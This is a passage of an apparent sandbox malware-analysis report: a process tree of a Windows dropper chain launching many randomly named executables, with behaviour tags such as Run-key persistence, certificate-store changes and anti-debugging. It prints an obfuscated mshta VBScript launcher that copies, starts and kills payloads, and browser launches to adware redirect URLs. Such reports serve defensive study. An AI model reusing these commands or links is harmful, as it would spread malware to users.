                                                                "C:\Users\Admin\Pictures\Adobe Films\mV0TwJYjjETnUWHpQms2tVRR.exe"
                                                                8⤵
                                                                  PID:5464
                                                                • C:\Users\Admin\Pictures\Adobe Films\KcN0McfKzo3WBQXDDyqrzH6l.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\KcN0McfKzo3WBQXDDyqrzH6l.exe"
                                                                  8⤵
                                                                    PID:5444
                                                                  • C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"
                                                                    8⤵
                                                                      PID:5740
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                        9⤵
                                                                          PID:3992
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe" ) do taskkill -iM "%~NXI" -f
                                                                            10⤵
                                                                              PID:5644
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill -iM "gM_Dq9RAigQVrO65QyAT_YbN.exe" -f
                                                                                11⤵
                                                                                • Kills process with taskkill
                                                                                PID:7696
                                                                        • C:\Users\Admin\Pictures\Adobe Films\Pm3g9ctfYddsVPVoDBAKdcm8.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\Pm3g9ctfYddsVPVoDBAKdcm8.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:4048
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 276
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:6308
                                                                        • C:\Users\Admin\Pictures\Adobe Films\y27eaN4WzB3Ik0pAQnIEBr9S.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\y27eaN4WzB3Ik0pAQnIEBr9S.exe" /mixtwo
                                                                          8⤵
                                                                            PID:6676
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 276
                                                                              9⤵
                                                                              • Program crash
                                                                              • Checks processor information in registry
                                                                              • Enumerates system info in registry
                                                                              PID:7404
                                                                          • C:\Users\Admin\Pictures\Adobe Films\9jJ9ZK8wNOAcHfGlEJ5VsdiO.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\9jJ9ZK8wNOAcHfGlEJ5VsdiO.exe"
                                                                            8⤵
                                                                              PID:6748
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 1740
                                                                                9⤵
                                                                                • Program crash
                                                                                • Checks processor information in registry
                                                                                • Enumerates system info in registry
                                                                                PID:7532
                                                                            • C:\Users\Admin\Pictures\Adobe Films\GVi1E2RMXCQC_mvEMhGlJTDv.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\GVi1E2RMXCQC_mvEMhGlJTDv.exe"
                                                                              8⤵
                                                                                PID:2424
                                                                                • C:\Users\Admin\AppData\Roaming\6440459.scr
                                                                                  "C:\Users\Admin\AppData\Roaming\6440459.scr" /S
                                                                                  9⤵
                                                                                    PID:8188
                                                                                  • C:\Users\Admin\AppData\Roaming\7235880.scr
                                                                                    "C:\Users\Admin\AppData\Roaming\7235880.scr" /S
                                                                                    9⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:6168
                                                                                  • C:\Users\Admin\AppData\Roaming\5108028.scr
                                                                                    "C:\Users\Admin\AppData\Roaming\5108028.scr" /S
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:2036
                                                                                  • C:\Users\Admin\AppData\Roaming\1487741.scr
                                                                                    "C:\Users\Admin\AppData\Roaming\1487741.scr" /S
                                                                                    9⤵
                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                    PID:8124
                                                                                  • C:\Users\Admin\AppData\Roaming\3887265.scr
                                                                                    "C:\Users\Admin\AppData\Roaming\3887265.scr" /S
                                                                                    9⤵
                                                                                      PID:3776
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\i1SR0Sa2ONI4aPlA1UigAn2R.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\i1SR0Sa2ONI4aPlA1UigAn2R.exe"
                                                                                    8⤵
                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                    PID:4900
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"
                                                                                    8⤵
                                                                                      PID:1520
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-B4L33.tmp\0b5u9vmZhup2k81jwi8q31nK.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-B4L33.tmp\0b5u9vmZhup2k81jwi8q31nK.tmp" /SL5="$103C4,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"
                                                                                        9⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:4452
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-Q3475.tmp\DYbALA.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-Q3475.tmp\DYbALA.exe" /S /UID=2709
                                                                                          10⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Adds Run key to start application
                                                                                          • Drops file in Program Files directory
                                                                                          PID:7656
                                                                                          • C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe
                                                                                            "C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe" /VERYSILENT
                                                                                            11⤵
                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                            PID:1212
                                                                                          • C:\Users\Admin\AppData\Local\Temp\93-6ad3d-51b-04885-8417ec5add26b\Wymobelewa.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\93-6ad3d-51b-04885-8417ec5add26b\Wymobelewa.exe"
                                                                                            11⤵
                                                                                            • Modifies system certificate store
                                                                                            PID:6748
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                              12⤵
                                                                                              • Adds Run key to start application
                                                                                              • Checks processor information in registry
                                                                                              • Enumerates system info in registry
                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:6308
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                13⤵
                                                                                                  PID:6956
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                                                                                                  13⤵
                                                                                                    PID:8664
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
                                                                                                    13⤵
                                                                                                      PID:8692
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
                                                                                                      13⤵
                                                                                                        PID:8732
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                                        13⤵
                                                                                                          PID:8936
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                          13⤵
                                                                                                            PID:9028
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
                                                                                                            13⤵
                                                                                                              PID:9492
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
                                                                                                              13⤵
                                                                                                                PID:9792
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
                                                                                                                13⤵
                                                                                                                  PID:9804
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:8
                                                                                                                  13⤵
                                                                                                                    PID:10344
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:8
                                                                                                                    13⤵
                                                                                                                      PID:10412
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
                                                                                                                      13⤵
                                                                                                                        PID:12284
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                                                                                                                        13⤵
                                                                                                                          PID:12776
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5472 /prefetch:2
                                                                                                                          13⤵
                                                                                                                            PID:13600
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1
                                                                                                                            13⤵
                                                                                                                              PID:880
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5324 /prefetch:8
                                                                                                                              13⤵
                                                                                                                                PID:10348
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
                                                                                                                                13⤵
                                                                                                                                  PID:8336
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                                                                                                                                  13⤵
                                                                                                                                    PID:10192
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:8
                                                                                                                                    13⤵
                                                                                                                                      PID:17760
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
                                                                                                                                      13⤵
                                                                                                                                        PID:21404
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
                                                                                                                                        13⤵
                                                                                                                                          PID:5400
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                                                          13⤵
                                                                                                                                            PID:9576
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                                                                                                                                            13⤵
                                                                                                                                              PID:26756
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
                                                                                                                                              13⤵
                                                                                                                                                PID:31688
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:8
                                                                                                                                                13⤵
                                                                                                                                                  PID:33836
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
                                                                                                                                                  13⤵
                                                                                                                                                    PID:36072
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
                                                                                                                                                    13⤵
                                                                                                                                                      PID:36216
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                    12⤵
                                                                                                                                                      PID:17040
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                                                                        13⤵
                                                                                                                                                          PID:17084
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                        12⤵
                                                                                                                                                          PID:17080
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                                                                            13⤵
                                                                                                                                                              PID:10008
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                            12⤵
                                                                                                                                                              PID:21312
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:21336
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:26672
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:26692
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:31596
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:31616
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:35976
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e6014718
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:36000
